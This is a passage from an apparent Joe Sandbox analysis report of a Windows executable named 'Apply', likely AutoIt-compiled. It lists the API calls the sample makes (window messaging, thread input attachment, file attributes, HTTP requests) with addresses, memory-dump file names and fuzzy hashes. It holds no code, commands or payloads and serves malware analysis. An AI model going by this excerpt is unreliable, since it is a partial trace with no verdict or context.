                                                    • VariantInit.OLEAUT32(?), ref: 008B01A1
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 008B01C1
                                                    • VariantCopy.OLEAUT32(?,?), ref: 008B0214
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 008B0228
                                                    • VariantClear.OLEAUT32(?), ref: 008B023D
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 008B024A
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0253
                                                    • VariantClear.OLEAUT32(?), ref: 008B0265
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0270
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 658f4b9595f057615f22c024c99a3c31e22cb8db175782d72ca255b8151d29a3
                                                    • Instruction ID: 4f0be91026069e77a069e9c006cd932fa5b9003799639b099587191e1c757362
                                                    • Opcode Fuzzy Hash: 658f4b9595f057615f22c024c99a3c31e22cb8db175782d72ca255b8151d29a3
                                                    • Instruction Fuzzy Hash: B1414F75A002199FCF05DF68D8889EE7BB9FF58344F008025E915EB361D730A949CF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 707087890-567219261
                                                    • Opcode ID: 281d6b497d270fc9c5b8eb76e8f167d93276de234c13fa1162d0387ae193e3b3
                                                    • Instruction ID: cd6f3d884ad1b70155d6de2c2eb7360fe1c9fa57ada45c2cdade3109b62cd991
                                                    • Opcode Fuzzy Hash: 281d6b497d270fc9c5b8eb76e8f167d93276de234c13fa1162d0387ae193e3b3
                                                    • Instruction Fuzzy Hash: CB51B131A045169BCB15DFACD9908BDB3B5FF64324B60432AE8AAE7384DB31DE41C790
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 008C89C6
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008C89D6
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008C89E2
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8A7F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8A93
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8AC5
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C8AFB
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8B04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                    • String ID: *.*
                                                    • API String ID: 1464919966-438819550
                                                    • Opcode ID: 09c59330d348bd9bb5b24fb9652aa12fe40ab6befb48162edb7727e5e5c0effc
                                                    • Instruction ID: d9ef6061a5fa61d99157e2c729c3e94cd67b2c96c796b5976ed7cadb3a72cf06
                                                    • Opcode Fuzzy Hash: 09c59330d348bd9bb5b24fb9652aa12fe40ab6befb48162edb7727e5e5c0effc
                                                    • Instruction Fuzzy Hash: 64612A725043059FCB10EF64C885EAEB7E8FF89314F04891EE999D7251EB31E949CB92
                                                    APIs
                                                    • CreateMenu.USER32 ref: 008E4437
                                                    • SetMenu.USER32(?,00000000), ref: 008E4446
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E44CE
                                                    • IsMenu.USER32(?), ref: 008E44E2
                                                    • CreatePopupMenu.USER32 ref: 008E44EC
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E4519
                                                    • DrawMenuBar.USER32 ref: 008E4521
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0$F
                                                    • API String ID: 161812096-3044882817
                                                    • Opcode ID: c0a11d16a4caa9c8b97e1ce376cf8c72a5e3f7b9a1048bc463042e5591040f8a
                                                    • Instruction ID: 98e83b5d8f1fe45a80c5497a8d0f61829cd7e4e738d2ff68bf28ecb81b9ae8d0
                                                    • Opcode Fuzzy Hash: c0a11d16a4caa9c8b97e1ce376cf8c72a5e3f7b9a1048bc463042e5591040f8a
                                                    • Instruction Fuzzy Hash: 5A413579A01349EFDF24CF65E884AAA7BB5FF4A314F140029F959AB3A0D731A914CB50
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 008B2646
                                                    • GetDlgCtrlID.USER32 ref: 008B2651
                                                    • GetParent.USER32 ref: 008B266D
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B2670
                                                    • GetDlgCtrlID.USER32(?), ref: 008B2679
                                                    • GetParent.USER32(?), ref: 008B268D
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B2690
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: f9f01020bb9c6e2e0aa4a5e64b575b5b4b28656460d00e98f5cced658d337742
                                                    • Instruction ID: 2da3db3f7727dea9ddc8daed6a32a592780d17de544f90a5f1cf256afa1bac80
                                                    • Opcode Fuzzy Hash: f9f01020bb9c6e2e0aa4a5e64b575b5b4b28656460d00e98f5cced658d337742
                                                    • Instruction Fuzzy Hash: 8121C274E40218BBCF04ABA4CCC5EEEBBB4FF19310F004556B952DB2A2DA795809DB61
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 008B2725
                                                    • GetDlgCtrlID.USER32 ref: 008B2730
                                                    • GetParent.USER32 ref: 008B274C
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B274F
                                                    • GetDlgCtrlID.USER32(?), ref: 008B2758
                                                    • GetParent.USER32(?), ref: 008B276C
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B276F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: 15682f2c18b809818b89d8d8bf0b7a0e9ad3f79c756a6622b75d6636590e62af
                                                    • Instruction ID: e39b16ccd8e90b7098ecee53e56486bd0ee4eeaf1a7c01fefa708141550b0efc
                                                    • Opcode Fuzzy Hash: 15682f2c18b809818b89d8d8bf0b7a0e9ad3f79c756a6622b75d6636590e62af
                                                    • Instruction Fuzzy Hash: 0221C274901218BBCF04ABA4CCC5EEEBBB8FF04300F004546B951DB2A2DA395849DB65
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008E425B
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008E425E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E4285
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E42A8
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008E4320
                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008E436A
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008E4385
                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008E43A0
                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008E43B4
                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008E43D1
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: f15e4dd2b13aef8a8e68d6f952e7c26061bf0b2fb908f46ce565c6fa67ca8a16
                                                    • Instruction ID: 3d7a830b5957d5aa4419e95defad461dda8e09c1064a31ab4ec05dd0cb6b7b13
                                                    • Opcode Fuzzy Hash: f15e4dd2b13aef8a8e68d6f952e7c26061bf0b2fb908f46ce565c6fa67ca8a16
                                                    • Instruction Fuzzy Hash: 7B614775900248AFDB21DFA8CC81EEE77B8FB0A714F10015AFA19EB3A1C770A945DB50
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 008BB852
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB866
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 008BB86D
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB87C
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BB88E
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8A7
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8B9
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8FE
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB913
                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB91E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 3a33578a732821ce2b8ae3a2c674bb7297c9ddfb3ded8f84ed5707cca561179e
                                                    • Instruction ID: 4160b249f61ea0f50d706813f3f445db1764ba9bd478908d0fdffb529e1ed9a8
                                                    • Opcode Fuzzy Hash: 3a33578a732821ce2b8ae3a2c674bb7297c9ddfb3ded8f84ed5707cca561179e
                                                    • Instruction Fuzzy Hash: D3318171510308AFEB309F64DC88FA97BA9FB51351F104015FB19DB3A0E7B49D85AB60
                                                    APIs
                                                    • _free.LIBCMT ref: 00882FE4
                                                      • Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
                                                      • Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40
                                                    • _free.LIBCMT ref: 00882FF0
                                                    • _free.LIBCMT ref: 00882FFB
                                                    • _free.LIBCMT ref: 00883006
                                                    • _free.LIBCMT ref: 00883011
                                                    • _free.LIBCMT ref: 0088301C
                                                    • _free.LIBCMT ref: 00883027
                                                    • _free.LIBCMT ref: 00883032
                                                    • _free.LIBCMT ref: 0088303D
                                                    • _free.LIBCMT ref: 0088304B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 0f8a58ebee2ba17233c84a6a5416b8bc504a842c723e7e41502b958c92bffed0
                                                    • Instruction ID: 2461962d8e96dab79c49818d63837ce1209200db37e876a3171b5c735c0e8e7f
                                                    • Opcode Fuzzy Hash: 0f8a58ebee2ba17233c84a6a5416b8bc504a842c723e7e41502b958c92bffed0
                                                    • Instruction Fuzzy Hash: 8711447651010CAFDB41FF98C942CDD7FA5FF05350B6181A5BA08DF622DA31EE509B91
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00854385
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00854424
                                                    • UnregisterHotKey.USER32(?), ref: 00854609
                                                    • DestroyWindow.USER32(?), ref: 00893D80
                                                    • FreeLibrary.KERNEL32(?), ref: 00893DE5
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00893E12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 07890ec945674adf932e61f68ce9eabdb8400a1de24ee60bb92e4fe5874585ae
                                                    • Instruction ID: 11aa218b5f4f057c0951b61540e6edcfe047024ee772c1b15d88161b9d9a5e9e
                                                    • Opcode Fuzzy Hash: 07890ec945674adf932e61f68ce9eabdb8400a1de24ee60bb92e4fe5874585ae
                                                    • Instruction Fuzzy Hash: 84D15871601212CFCB29EF18C895A69F7A0FF04719F1542ADE94AEB261CB31ED5ACF41
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C871C
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8730
                                                    • GetFileAttributesW.KERNEL32(?), ref: 008C875A
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 008C8774
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8786
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008C87CF
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C881F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile
                                                    • String ID: *.*
                                                    • API String ID: 769691225-438819550
                                                    • Opcode ID: c912ff903cad6483dc74eed0b2f050a636ee87d6ee3b3c25bd61d948b619a1fe
                                                    • Instruction ID: 56b5d7acf7afb1f4a675b551ae4d40387ac1a013033817ad4b918057f287e873
                                                    • Opcode Fuzzy Hash: c912ff903cad6483dc74eed0b2f050a636ee87d6ee3b3c25bd61d948b619a1fe
                                                    • Instruction Fuzzy Hash: 68817D71544344DFCB20EF18C498EAAB3F9FB95314F14882EF885D7250EB74E9498B92
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00856337
                                                      • Part of subcall function 008563C7: GetClientRect.USER32(?,?), ref: 008563ED
                                                      • Part of subcall function 008563C7: GetWindowRect.USER32(?,?), ref: 0085642E
                                                      • Part of subcall function 008563C7: ScreenToClient.USER32(?,?), ref: 00856456
                                                    • GetDC.USER32 ref: 0089509B
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008950AE
                                                    • SelectObject.GDI32(00000000,00000000), ref: 008950BC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 008950D1
                                                    • ReleaseDC.USER32(?,00000000), ref: 008950D9
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0089516A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: df5a5730948eccdb63bf9b576ddd5e21feebe826f8d383a093a63d2e4aac9067
                                                    • Instruction ID: bf9a5131b25e3bef8bffd2755db850991fb5f84a5f6ee4138ff11ac2530f504a
                                                    • Opcode Fuzzy Hash: df5a5730948eccdb63bf9b576ddd5e21feebe826f8d383a093a63d2e4aac9067
                                                    • Instruction Fuzzy Hash: 1271FC30500609EFCF26AF68CC84AAA7BB1FF49324F184269ED55DB2A6D3318C95DB50
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                      • Part of subcall function 0085135A: GetCursorPos.USER32(?), ref: 0085136E
                                                      • Part of subcall function 0085135A: ScreenToClient.USER32(00000000,?), ref: 0085138B
                                                      • Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000001), ref: 008513C2
                                                      • Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000002), ref: 008513DC
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 008E9257
                                                    • ImageList_EndDrag.COMCTL32 ref: 008E925D
                                                    • ReleaseCapture.USER32 ref: 008E9263
                                                    • SetWindowTextW.USER32(?,00000000), ref: 008E92FE
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008E9311
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008E93EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 1924731296-2107944366
                                                    • Opcode ID: 9db5aa85ed40aa1739f35cb89da7d36547f0666b36321321b21a5b29c2564a5c
                                                    • Instruction ID: 7e18eac9a8636e5a0bac9e0514e04a1fa6f9e9be87211067d42749f6be83f0db
                                                    • Opcode Fuzzy Hash: 9db5aa85ed40aa1739f35cb89da7d36547f0666b36321321b21a5b29c2564a5c
                                                    • Instruction Fuzzy Hash: 9051BC74104344AFDB14EF18DC9AFAA77E4FB88715F00061DF9929B2E1DBB09949CB92
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CC9E1
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCA09
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCA39
                                                    • GetLastError.KERNEL32 ref: 008CCA91
                                                    • SetEvent.KERNEL32(?), ref: 008CCAA5
                                                    • InternetCloseHandle.WININET(00000000), ref: 008CCAB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 83c8548870219ab0a7c01fb7f0f921cd73886dd577117ba522b45eac62058947
                                                    • Instruction ID: cd78a62978d81ac0c863727e2f9051d9544cab4d48fc8332cb2c82ba8a9c5bb1
                                                    • Opcode Fuzzy Hash: 83c8548870219ab0a7c01fb7f0f921cd73886dd577117ba522b45eac62058947
                                                    • Instruction Fuzzy Hash: A33158B1600708AFD721DF659C88FAB7BBCFB49784B10851EE44AD6210EB34ED089B61
                                                    APIs
                                                    • GetParent.USER32 ref: 008B278D
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 008B27A2
